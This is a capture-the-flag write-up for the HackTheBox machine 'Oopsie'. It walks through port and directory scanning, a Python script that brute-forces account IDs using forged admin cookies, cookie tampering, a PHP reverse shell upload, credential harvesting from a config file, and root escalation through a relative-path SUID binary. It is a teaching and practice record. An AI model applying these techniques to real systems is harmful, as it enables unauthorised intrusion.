Contents

HackTheBox - Oopsie Writeup

Box author | MrR3bootMrR3boot

Enumeration

  • Top 1000 ports scan
1
nmap -sC -sV -oN nmap/inital 10.10.10.28

/posts/htb/oopsie/2.png
nmap initial scan

  • all ports scan
1
nmap -sC -sV -p- -oN nmap/all_ports 10.10.10.28

/posts/htb/oopsie/3.png
nmap allports scan

  • Still the same result
  • Open ports
    • port 22 / ssh
    • port 80 / http

The Website

/posts/htb/oopsie/4.png
MegaCorp Automotive webpage

Gobuster

  • Auto recon in the background
  • looking the hidden directory
1
gobuster dir -u http://10.10.10.28 -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt -o gobuster.log
  • The result

/posts/htb/oopsie/5.png
gobuster

This webpage have an upload directory.

Login Page

  • Found something insteresting in the source code

/posts/htb/oopsie/6.png
view source code

  • the directory into /cdn-cgi/login/script.js
  • navigate into http://10.10.10.28/cdn-cgi/login
  • found the login page

/posts/htb/oopsie/7.png
login page

  • Got the credentials in previous box called Archetype in official pdf
  • Successfully login as admin

/posts/htb/oopsie/8.png
admin webpage

Can’t Upload

  • navigate to the upload page
  • it says super admin have right to view it

/posts/htb/oopsie/9.png
can't view upload page

The ID

/posts/htb/oopsie/10.png
id parameter

  • This page appear to be user table base on the id parameter in the link
  • Making python script for IDs brute-force

Foothold/Gaining Access

Python Script

  • python script for ID brute force
  • need cookies for authentication
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
#!/usr/bin/env python3

import requests

for i in range(101):
    url = f"http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id={i}"
    c = {'user':'34322','role':'admin'}
    r = requests.get(url, cookies=c)

    if len(r.content) == 3595: # nothing appear just pass it
        pass
    else:
        print(f"Check this ID out {i}")
print("Done")
  • The result

/posts/htb/oopsie/11.png
brute-force id

  • Here is the ID lead to (in order)
1
2
3
4
5
{'access id':'34322','name':'admin','email':'[email protected]'}
{'access id':'8832','name':'john','email':'[email protected]'}
{'access id':'57633','name':'Peter','email':'[email protected]'}
{'access id':'28832','name':'Rafol','email':'[email protected]'}
{'access id':'xxxxx','name':'super admin','email':'[email protected]'}

Upload as super admin

  • Found the super admin table

/posts/htb/oopsie/12.png
found superadmin table

  • Turns out the Access ID it is the cookie value
  • Change the admin cookies into super admin

/posts/htb/oopsie/13.png
admin cookie

before

/posts/htb/oopsie/14.png
superadmin cookie

after refresh the page

Reverse Shell

/posts/htb/oopsie/15.png
upload php reverse shell

  • Activated the reverse shell
    • through this link

/posts/htb/oopsie/16.png
execute the shell

  • Got the shell

/posts/htb/oopsie/17.png
shell as www-data

www-data

  • Found the credentials in file called db.php
  • in /var/www/html/cdn-cgi/login/db.php

/posts/htb/oopsie/18.png
found robert credentials

Robert

  • Login as robert

/posts/htb/oopsie/19.png
change user to robert

User Flag

/posts/htb/oopsie/20.png
user flag

  • Find the SUID
  • The command for find it
1
find / -user root -perm -4000 -exec ls {} \; 2>/dev/null
  • Found weird binary that not suppose to be there

/posts/htb/oopsie/21.png
find all SUID

Privilege Escalation

Bugtracker

  • This is how it works
  • However it says no such file or directory

/posts/htb/oopsie/22.png
cat error

  • Try strings out the binary
  • Turns out this binary use cat command
  • However this is use relative path

/posts/htb/oopsie/23.png
strings bugtracker

  • explain the relative & absolute path

/posts/htb/oopsie/24.png
relative & absolute path differences

Relative Path Abused

/posts/htb/oopsie/25.png
shell as root

Root Flag

/posts/htb/oopsie/26.png
root flag

Conclusion

I’ve learned a lot today. Never put the user ID as cookies value and make sure you configure the website properly. Lastly, make sure to configure the SUID binary carefully and do not put any untrust or unpatched version as SUID

I have a fun time doing this machine and I hope you guys too. Bye ;)